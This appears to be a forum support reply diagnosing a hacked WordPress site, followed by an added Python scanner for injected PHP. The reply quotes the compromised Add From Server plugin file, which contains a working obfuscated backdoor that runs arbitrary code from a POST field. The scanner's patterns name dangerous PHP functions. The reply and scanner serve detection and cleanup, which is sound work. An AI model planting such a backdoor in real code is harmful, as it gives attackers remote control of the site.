Here’s the content of add-from-server.php:

```php
<?php
$name = $_GET['name'];
if($name == 'c')
{
    $k="ass"."ert"; $k(${"_PO"."ST"} [afs_load]);
    exit;
}
/*
Plugin Name: Add From Server
Version: 3.2.0.3
Plugin URI: http://dd32.id.au/wordpress-plugins/add-from-server/
Description: Plugin to allow the Media Manager to add files from the webservers filesystem. <strong>Note:</strong> All files are copied to the uploads directory.
Author: Dion Hulse
Author URI: http://dd32.id.au/
*/
add_action('plugins_loaded', 'afs_load');
function afs_load() {
    if ( ! is_admin() )
        return;
    include 'class.add-from-server.php';
    $GLOBALS['add-from-server'] = new add_from_server( plugin_basename(__FILE__) );
}
```

Unfortunately I have to report that your website has been compromised.
The first 6 lines of that file are not supposed to be there. Delete the plugin immediately and reinstall it.
The alteration to the file allows a remote attacker to run any code on your site that they want.
I’m not aware of any vulnerabilities in Add From Server at present, so I don’t think the plugin is the source. This might not be the only instance of that code either.
You should search for similar code on your site, or run a security scan. http://codex.wordpress.org/FAQ_My_site_was_hacked might also offer you a suggestion as to what to do.
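
A small scanner for the "search for similar code" step recommended above, as an added example that is not part of the original thread or the plugin: it undoes string-literal concatenation, then flags the three traits of the injected lines quoted in the first post. The function names, rule set and sample are assumptions constructed for illustration, and the regex approach is a heuristic that supplements a full security scan.

```python
import re
from pathlib import Path

# Two quoted literals joined by PHP's "." operator, as in the injected line
CONCAT = re.compile(r"""(['"])([^'"\\]*)\1\s*\.\s*(['"])([^'"\\]*)\3""")
SG = r"_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)"
SPLIT = "function name built from string pieces"
RULES = [
    (SPLIT, re.compile(r"""['"](?:assert|eval|system|exec|passthru|shell_exec|create_function)['"]""", re.I)),
    ("superglobal reached through ${...}", re.compile(r"""\$\{\s*['"]%s['"]\s*\}""" % SG)),
    ("variable function called on request data", re.compile(r"""\$\w+\s*\(\s*\$(?:\{\s*['"])?%s""" % SG)),
]

def fold_concats(line):
    """Join adjacent quoted literals until stable (regex heuristic, not a PHP parser)."""
    prev = None
    while prev != line:
        prev = line
        line = CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', line)
    return line

def scan(src):
    """Return (line number, rule name) pairs for one PHP source string."""
    hits = []
    for no, raw in enumerate(src.splitlines(), 1):
        folded = fold_concats(raw)
        for name, rx in RULES:
            # A dangerous name already whole in the raw line is ordinary code, not obfuscation
            if rx.search(folded) and not (name == SPLIT and rx.search(raw)):
                hits.append((no, name))
    return hits

def scan_tree(root):
    """Scan every .php file under root and keep only the files with findings."""
    found = {str(p): scan(p.read_text(errors="replace")) for p in Path(root).rglob("*.php")}
    return {path: hits for path, hits in found.items() if hits}

# Constructed sample: the injected lines quoted in the post, then one clean plugin line
SAMPLE = '''<?php
$name = $_GET['name'];
if($name == 'c')
{
$k="ass"."ert"; $k(${"_PO"."ST"} [afs_load]);
exit;
}
add_action('plugins_loaded', 'afs_load');
'''
```

Calling `scan_tree()` on the WordPress root lists each file with findings; every hit still needs manual review, since a clean result does not prove the site is clean.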